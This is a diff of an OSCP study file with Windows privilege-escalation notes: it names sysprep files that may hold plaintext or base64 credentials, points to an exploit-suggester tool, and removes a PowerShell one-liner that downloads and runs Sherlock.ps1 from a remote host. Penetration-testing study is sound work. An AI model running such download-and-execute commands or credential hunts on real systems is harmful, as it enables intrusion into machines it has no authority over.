Emanlui/OSCP-Scripts/Windows.md

 `C:\Windows\system32\sysprep.inf`
 `C:\Windows\system32\sysprep\sysprep.xml`

-`If you find one open it and search for tag.
+`If you find one, open it and search for tag.
 Stored as plaintext or base64.`

 ### Kernel Exploits

 WMIC CPU Get DeviceID,NumberOfCores,NumberOfLogicalProcessors

 Use [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)

-Serlock

-Config: Add to the last line the "Find-AllVulns" Download and run Sherlock:

-`echo IEX(New-Object Net.WebClient).DownloadString('http://:/Sherlock.ps1') | powershell -noprofile -`

 ### Applications and Drivers Exploits